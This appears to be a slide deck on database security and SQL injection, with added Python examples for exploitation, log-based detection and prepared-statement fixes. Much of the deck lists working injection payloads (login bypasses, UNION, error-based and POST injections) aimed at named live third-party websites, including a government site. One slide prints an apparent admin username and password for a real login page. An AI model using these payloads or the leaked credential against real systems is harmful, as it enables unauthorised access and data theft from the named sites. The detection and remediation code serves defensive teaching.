DATABASE & DATABASE SECURITY
BY REHAN MANZOOR
What actually is a database
- Code and filing concept

History of Database

Major Database Vendors

Interaction with Database

How we Interact (Direct Queries)

Custom defined functions

Stored Procedures

Integration with Languages

Static Apps

Dynamic Apps

Need in CMS
How We Integrate
- Well, that is the real question: how we integrate. It creates a problem when we don't attach the app to the database correctly. Code is important.
Contents continued..
- Database Attacks
- What is a Database Attack
- Explanation
- OWASP Rating (damage rate)
- Destruction of SQL injection
- History Reviews
- Recent bidding in underground
Database Attacks
- Excessive Privileges
- Privilege abuse
- Unauthorized privilege elevation
- Platform Vulnerabilities
- SQL Injection
- Weak Audit
- Denial of Service
Top 10 vulnerabilities by OWASP

Destruction of SQL Injection Attack
- Heartland Payment Systems: this New Jersey payment processing firm lost data on tens of millions of credit cards in an attack disclosed in 2009. Around 175,000 businesses were affected by the theft.
- TJX: more than 45 million people had their credit card details stolen, and some experts said the actual figure was likely to be closer to 94 million.

Recent Bidding in Underground
Login on Live Sites
- http://www.equinet.ch/fr/gestion/login.php
  1' OR '1'='1
- http://lionsclubofwashim.co.in/admin.php
  1' OR '1'='1
- admin.axilbusiness.in
  1' OR '1'='1
- http://www.anemos.in/admin/
  1' OR '1'='1
- Query Code (the login query behind these forms, built by string concatenation):
  select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';

Union based attack
- http://greenforce.com.pk/page.aspx?page_id=24+UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -
- http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables--
- http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null --
- Code (the page query, again built by concatenating the query-string value):
  select * from tblName where id='"+Request.QueryString["id"]+"';
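The two slides above show the concatenated queries and the payloads but not what happens when they meet. The following is an added example, not code from the slides: it rebuilds both vulnerable queries in Python over an in-memory SQLite database and runs the slides' payloads against them. SQLite stands in for the sites' SQL Server/MySQL back ends, so sqlite_version() plays the role of @@version and sqlite_master the role of information_schema.tables; the table names come from the slides' queries, the row contents are assumptions made for this example. It also goes one step beyond the slides by showing the null-padding probe a tester uses to learn how many columns the UNION must supply.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the sites' back ends (SQLite in place of
    SQL Server/MySQL; table names come from the slides, row contents are
    assumptions made for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'hunter2');
        CREATE TABLE tblName (id INTEGER, title TEXT, body TEXT);
        INSERT INTO tblName VALUES (24, 'About us', 'Company profile');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The login slide's query, built by string concatenation: whatever the
    user types becomes part of the SQL text."""
    sql = ("select username, password from admin where username='" + username
           + "' and password='" + password + "';")
    return conn.execute(sql).fetchall()


def page_vulnerable(conn, page_id):
    """The union slide's lookup: select * from tblName where id='<id>'."""
    sql = "select * from tblName where id='" + page_id + "';"
    return conn.execute(sql).fetchall()


# Tautology payload from the login slide.  Spliced in, the query becomes
#   ... where username='1' OR '1'='1' and password='1' OR '1'='1'
# and the trailing OR '1'='1' makes the WHERE clause true for every row.
LOGIN_BYPASS = "1' OR '1'='1"


def find_column_count(conn, max_cols=10):
    """Manual UNION reconnaissance: add one null per column until the database
    stops complaining about mismatched column counts.  The result is how many
    values the injected SELECT must supply (7 on the greenforce slide)."""
    for n in range(1, max_cols + 1):
        payload = "-1' UNION ALL SELECT " + ",".join(["null"] * n) + "-- -"
        try:
            page_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_version(conn):
    """sqlite_version() stands in for @@version in the slide's payload; the
    value comes back through the page's second output column."""
    payload = "-1' UNION ALL SELECT null, sqlite_version(), null-- -"
    return page_vulnerable(conn, payload)[0][1]


def version_leak_matches(conn):
    """True when the leaked version string is the engine's real version."""
    return dump_version(conn) == sqlite3.sqlite_version


def dump_tables(conn):
    """sqlite_master stands in for information_schema.tables: the injected
    SELECT lists every table name through the page's own output columns."""
    payload = "-1' UNION ALL SELECT null, name, null FROM sqlite_master-- -"
    return [row[1] for row in page_vulnerable(conn, payload)]


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, LOGIN_BYPASS, LOGIN_BYPASS))
    print(find_column_count(db), dump_version(db), dump_tables(db))
```

The id of -1 in the UNION payloads is there so that the legitimate half of the query matches nothing and only the attacker's rows come back, which is why the slides' URLs use id=-3 and ID=-7; the trailing `-- -` comments out the closing quote and semicolon the application appends.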
Error Based Attack
- http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
- http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2
- http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
- http://www.grabbbit.com/admin/login.aspx
  userid: admin
  password: grabbbit$
- Code (the page query; the value forced through convert(int, ...) comes back in the database's error message):
  select column1,column2,column3 from table1 join table2 on table1.column1 = table2.column1 where id='"+Request.QueryString["id"]+"';

Blind Attack
- fgcineplex.com.sg/Images/slideshow/sizzlingsoul.php
- Code: the query is the same as in the union case, but the problem is with the labels. The designer's labels are not picked up: either they are also stored in the database, or they cannot work with union.

POST SQL Injection
- url: http://haryanapolice.gov.in/police/pressreleases/search.asp
- Post: text1=rummy'&text2=11/11/2010&SUBMIT=search
- Code (the search query, concatenating the form fields the same way the GET examples concatenate the query string):
  select * from tablename where text1='"+Request.Form["text1"].ToString()+"' and text2='"+Request.Form["text2"].ToString()+"';

Why SQL Injection Is Possible
- Who is responsible: the database or the programmer?
- Why not to blame the database
- The database's secure nature
- Lack of awareness
- No research-based study
- Lack of interest
- Non-professional coders

Detection of SQL Injection
- Manual Check: Why, How, By Whom
- Automated Check: Tools, Scanners
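The detection slide names manual and automated checks without showing either. The following is an added example, not from the slides: an automated check on the defender's side that scans web-server access logs for the attack shapes the earlier slides use (UNION ... SELECT, @@version probes, the 1' OR '1'='1 tautology, convert(int, ...) error-based casts, information_schema reads and comment terminators). The log lines are constructed for this example, not real traffic; the paths reuse the slides' payload styles against made-up hosts.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic).  Paths mirror the payload
# styles on the earlier slides; the first and sixth lines are ordinary requests.
SAMPLE_LOG = """\
10.0.0.1 - - [10/Nov/2010:10:00:01] "GET /page.aspx?page_id=24 HTTP/1.1" 200 5120
10.0.0.2 - - [10/Nov/2010:10:00:05] "GET /page.aspx?page_id=24+UNION+ALL+SELECT+null,null,@@version,null-- HTTP/1.1" 200 5211
10.0.0.3 - - [10/Nov/2010:10:00:09] "GET /ContentPage.aspx?id=21%20and%20@@version%3E1--%20- HTTP/1.1" 500 812
10.0.0.4 - - [10/Nov/2010:10:00:12] "GET /resourcelist.cfm?audience_ID=5%20and%201=convert(int,@@version)--%20- HTTP/1.1" 500 901
10.0.0.5 - - [10/Nov/2010:10:00:15] "GET /login.php?user=1%27%20OR%20%271%27=%271 HTTP/1.1" 302 0
10.0.0.6 - - [10/Nov/2010:10:00:20] "GET /news.aspx?id=7 HTTP/1.1" 200 4000
10.0.0.7 - - [10/Nov/2010:10:00:25] "GET /page.aspx?id=-3%20UNION%20ALL%20SELECT%20table_name,null,null%20from%20information_schema.tables-- HTTP/1.1" 200 5300
"""

# Each signature is one attack shape from the slides; all are case-insensitive
# because SQL keywords are.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("version-probe", re.compile(r"@@version|\bversion\(\)", re.I)),
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
    ("error-based-cast", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("schema-probe", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("comment-terminator", re.compile(r"--\s*-?$|--\s|/\*")),
]

# Common log format: client IP, then the quoted request line, then the status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode(path):
    """Decode the request path twice: the slides' payloads arrive URL-encoded,
    and attackers double-encode to slip past filters that decode only once."""
    return unquote_plus(unquote_plus(path))


def scan_log(text):
    """Return one hit per log line whose decoded path matches a signature,
    with the client IP, HTTP status and the list of signatures that fired."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode(m.group("path"))
        fired = [name for name, rx in SIGNATURES if rx.search(decoded)]
        if fired:
            hits.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "signatures": fired,
                "path": decoded,
            })
    return hits


def suspicious_ips(text):
    """Distinct client addresses that sent at least one matching request."""
    return sorted({h["ip"] for h in scan_log(text)})


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ",".join(hit["signatures"]), hit["path"])
```

A 500 response alongside a version-probe or error-based-cast hit is the strongest signal in this set, because that is exactly the database error the error-based slide relies on reaching the browser. Signature matching is a starting point, not a complete detector: it will not see blind injection, which uses no such keywords, and that is where the slide's manual check (submitting a lone quote and comparing the page with a normal request) still earns its place.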
Securing From SQL Injection
- Learn about it
- Firewalls
- By code:
  - Don't disclose any parameter if at all possible
  - Give the session user the least possible rights
  - Blacklist evil keywords for the session user
  - Validate user input
  - Use prepared statements
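The "By code" items above are the fix for every query on the earlier slides, so here they are applied together. This is an added example, not code from the slides: the login and page queries rebuilt with prepared statements, an integer allow-list on the page id, and a read-only session in place of the privileged one. SQLite stands in for the sites' databases; its query_only pragma plays the role of a database account that has no write rights. Table names come from the slides, row contents are assumptions for this example, and the plaintext password comparison from the login slide is kept as-is because only the injection is being fixed here.

```python
import re
import sqlite3


def build_db():
    """Constructed sample database (SQLite; table names from the slides,
    contents are assumptions made for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'hunter2');
        CREATE TABLE tblName (id INTEGER, title TEXT, body TEXT);
        INSERT INTO tblName VALUES (24, 'About us', 'Company profile');
    """)
    # "Giving session user least possible rights": the web session only ever
    # reads, so the connection handed to it refuses every write.  The
    # query_only pragma stands in for a read-only database account.
    conn.execute("PRAGMA query_only = 1")
    return conn


def login_safe(conn, username, password):
    """Prepared statement: the values are bound to the ? placeholders after the
    SQL text has been parsed, so quotes and keywords inside them are data,
    never syntax.  The 1' OR '1'='1 payload is simply a username nobody has."""
    sql = "select username, password from admin where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()


# Input validation as an allow-list: a page id is an optionally signed integer
# and nothing else.  A keyword blacklist would have to anticipate every
# spelling of UNION; this rule needs no list at all.
PAGE_ID_RE = re.compile(r"-?\d+")


def is_valid_page_id(value):
    return isinstance(value, str) and PAGE_ID_RE.fullmatch(value.strip()) is not None


def page_safe(conn, page_id):
    """Validate first, then bind the (now integer) id as a parameter."""
    if not is_valid_page_id(page_id):
        raise ValueError("page id must be an integer")
    sql = "select * from tblName where id=?"
    return conn.execute(sql, (int(page_id),)).fetchall()


def write_blocked(conn):
    """Even a query an attacker manages to run cannot change data on this
    session: the write is refused by the database, not by application code."""
    try:
        conn.execute("DELETE FROM admin")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print(login_safe(db, "1' OR '1'='1", "1' OR '1'='1"))   # []
    print(page_safe(db, "24"))
    print(write_blocked(db))                                  # True
```

Of the slide's five items, the prepared statement is the one that removes the vulnerability; validation narrows what can reach the query and the read-only session limits what an injection could do if one remained. The keyword blacklist is the weakest of the five: the earlier slides already vary case (UNION ALL SELECT versus union all select) and pad with comments, both of which walk past a simple list.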
More on Firewalls
- Use of a firewall: as it is, or customized
- Buffer overflows
- Null bytes
- Difference between a normal user and a hacker

Buffer Overflows
- Live example: https://www.qmensolutions.com/remote_support_packs.php?packs=9%27--%20-
- Bypassing from keyword

Live Hack Of A Website
- http://aquaservices.co.in/

Conclusion
- Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.